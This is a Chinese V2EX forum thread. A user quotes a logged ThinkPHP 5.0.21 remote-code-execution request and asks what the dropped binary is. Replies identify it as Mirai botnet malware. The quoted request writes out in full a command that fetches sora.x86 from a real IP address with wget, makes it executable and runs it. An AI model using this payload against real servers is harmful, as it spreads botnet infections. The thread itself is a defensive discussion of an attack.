一起来分析下这个是啥病毒？

2021-09-27 20:11:52 +08:00

urmyfaith

http://5.182.210.129/bins/

http://5.182.210.129/bins/sora.x86 请不要点击执行。

"GET /thinkphp_5.0.21/?s=index/%5Cthink%5Capp/invokefunction

&function=call_user_func_array
&vars[0]=system
&vars[1][]=cd%20/tmp;

wget%20http://5.182.210.129/bins/sora.x86;
cat%20sora.x86%20%3E%20xdsf;
chmod%20777%20xdsf;
./xdsf%20
thinkphp HTTP/1.0",

这种是全网试么？利用 thinkPhp 漏洞，远程执行代码？

问题来了，这个 exe sora.x86 里面究竟是什么？

1514 次点击

所在节点

开源软件

5 条回复

opengps

2021-09-27 20:15:31 +08:00

“请不要点击执行”一定会有人执行的

leloext

2021-09-27 20:53:47 +08:00

mirai 后门

crab

2021-09-27 21:20:22 +08:00

upx 壳 elf linux 上的？

andy1ee11o2

2021-09-27 21:55:05 +08:00

Mirai Botnet

urmyfaith

2021-09-28 10:17:32 +08:00

有人分析过？

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/804708

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.